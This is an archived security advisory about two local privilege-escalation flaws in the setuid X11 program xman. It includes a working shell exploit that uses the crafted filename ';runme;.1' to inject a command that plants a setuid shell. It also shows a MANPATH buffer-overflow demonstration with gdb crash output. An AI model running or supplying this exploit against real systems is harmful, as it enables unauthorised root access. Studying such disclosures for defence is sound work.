TUCoPS :: Unix :: General :: xman.htm

TUCoPS :: Unix :: General :: xman.htm
Xman suid exploit
COMMAND
 xman
SYSTEMS AFFECTED
 xman
PROBLEM
 'Vde79' found following. xman doesn't drop privileges anywheres
 in the program, but does support suid installation. So,
 exploiting via a system call is much easier than the buffer
 overflow in MANPATH, mentioned in some earlier advisories. Here
 is an example of such an exploitation possibility:
 #!/bin/sh
 # example of xman exploitation. xman
 # supports privileges. but, never
 # drops them.
 # Vade79 -> v9@realhalo.org -> realhalo.org.
 MANPATH=~/xmantest/
 mkdir -p ~/xmantest/man1
 cd ~/xmantest/man1
 touch ';runme;.1'
 cat << EOF>~/xmantest/runme
 #!/bin/sh
 cp /bin/sh ~/xmansh
 chown `id -u` ~/xmansh
 chmod 4755 ~/xmansh
 EOF
 chmod 755 ~/xmantest/runme
 echo "click the ';runme;' selection," \
 "exit. then, check for ~/xmansh."
 xman -bothshown -notopbox
 rm -rf ~/xmantest
 
 'KF'added following. xman from at least
 X11R6-contrib-3.3.2-3.i386.rpm suffers from a classic overflow.
 [root@linux lib]# ls -al `which xman`
 -rwxr-sr-x 1 root man 41076 Jun 17 1998
 /usr/X11R6/bin/xman*
 
 [root@linux lib]# xman
 [root@linux lib]# export MANPATH=`perl -e 'print "A" x 7000'`
 [root@linux lib]# xman
 Xman Error: Could not allocate memory for manual sections.
 
 [root@linux lib]# export MANPATH=`perl -e 'print "A" x 70000'`
 [root@linux lib]# xman
 Segmentation fault
 
 [root@linux lib]# gdb xman
 GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
 (gdb) run
 Starting program: /usr/X11R6/bin/xman
 0x4022fb66 in getenv () from /lib/libc.so.6
 (gdb) bt
 #0 0x4022fb66 in getenv () from /lib/libc.so.6
 #1 0x0804bc47 in _start ()
 #2 0x41414141 in ?? ()
 Cannot access memory at address 0x41414141
 
 (gdb) info registers
 eax 0xbffee784 -1073813628
 ecx 0x804fb29 134544169
 edx 0x805414c 134562124
 ebx 0x40328f2c 1077055276
 esp 0xbffec6fc 0xbffec6fc
 ebp 0xbffec714 0xbffec714
 esi 0x6 6
 edi 0x41414141 1094795585
 eip 0x4022fb66 0x4022fb66
SOLUTION
 Nothing yet.